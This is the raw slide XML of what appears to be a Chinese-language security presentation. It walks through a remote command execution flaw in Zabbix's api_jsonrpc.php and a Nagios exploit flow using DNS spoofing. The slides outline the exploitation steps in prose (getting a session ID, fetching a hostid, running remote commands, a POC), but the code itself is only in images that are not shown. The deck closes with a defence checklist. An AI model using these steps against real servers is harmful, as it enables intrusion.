            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EC9DB0C5-67E0-4102-B789-413719DD5687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571566" y="2207438"/>
            <a:ext cx="4878389" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>api_jsonrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件中存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>误用，没有对输入语句进行检测直接执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>api_jsonrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法可以让用户通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> JSON RPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>协议来创建、更新和获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Zabbix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>对象。首先使用发包的方式模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的使用：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Session_id</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{292CE768-C7B5-45F6-BBD8-67F0F2590480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094412" y="2368756"/>
            <a:ext cx="4875213" cy="2843407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6448162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BFDC4B1-D65E-4725-AFF0-22D86629D0A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6A742B19-5E55-40E7-88DC-28BA050FDC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>session_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>host.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hostid</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C8376B9A-9E2A-4E02-BC2E-3A0205330FEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>执行远程命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B877120-0610-4327-85D6-9EBE0EF8C499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496640" y="3073400"/>
            <a:ext cx="4167933" cy="2717800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="内容占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{491DA368-D19E-49B6-9926-19C0F78E5E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670104" y="3073400"/>
            <a:ext cx="3879404" cy="2717800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1015716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AE0CA10-AD19-409D-8FA9-714DDD53E2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7EDFFBCC-9511-47ED-86E2-5554091923B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>成功得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令的结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>api_jsonrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>并不会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进行过滤，导致存在远程代码执行漏洞，将发送数据包的程序写成一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>直接执行：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{57809B50-C409-4E8D-BFC5-648E3BBCBEB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754755" y="716278"/>
            <a:ext cx="4875213" cy="2635632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8076D8C9-537C-4CC0-99D0-C7C4507F15EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019799" y="3926026"/>
            <a:ext cx="3604260" cy="2563495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9332265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0B2507B-FB22-4738-88B4-67EFCCA1B83A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8B17F3BD-A487-4959-ABFC-263FD90AAAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="1972518"/>
            <a:ext cx="7065299" cy="4266964"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接箭头连接符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CA7A0F68-F3E4-4B32-A00D-B1560BD85C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8203096" y="1656522"/>
            <a:ext cx="543339" cy="16432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xmlns="" id="{A01B9EB6-CDB7-4177-B048-2FBCA95B283C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050157" y="1287190"/>
            <a:ext cx="5067156" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>欺骗，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.Nagios.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>时会访问甲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接箭头连接符 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7C09CE24-EB63-4E30-83AB-B6ADA59ECED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2451652" y="3429000"/>
            <a:ext cx="2782957" cy="14080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xmlns="" id="{E74B3B9F-3CA8-4C1F-B2CD-D9C82F44B1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413284" y="3228945"/>
            <a:ext cx="2182008" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>重定向为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141533190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07F1467-95FF-47BC-9E77-75023E292788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{734C74CE-12DD-4F3D-A82F-65852A42593C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>远程命令执行成功：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{32FC2E6D-AC1B-427E-AFA8-DD110A3D32B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1321559" y="3050252"/>
            <a:ext cx="5145502" cy="3189230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6287115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EAFEA2D-2BE4-4D68-B709-01D314A8233C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测与防护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{82CE5423-9013-4415-8D66-25B08CB7061F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" u="sng" dirty="0"/>
              <a:t>防御的总体思路</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关闭不必要的服务和端口 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务管理员的密码，不要使用默认密码，使用尽量复杂的密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>写后台脚本，自动时时检测开启的端口；如果有其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>接入，自动提示。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>api_jsonrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>insertDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在执行命令之前一定要对命令进行处理，不允许出现特殊字符。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用最小特权原则，严格控制用户对文件读写和执行的权利。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10201029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F425C31-1171-4865-9CFF-DA5D78B480D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用脚本关闭非法用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
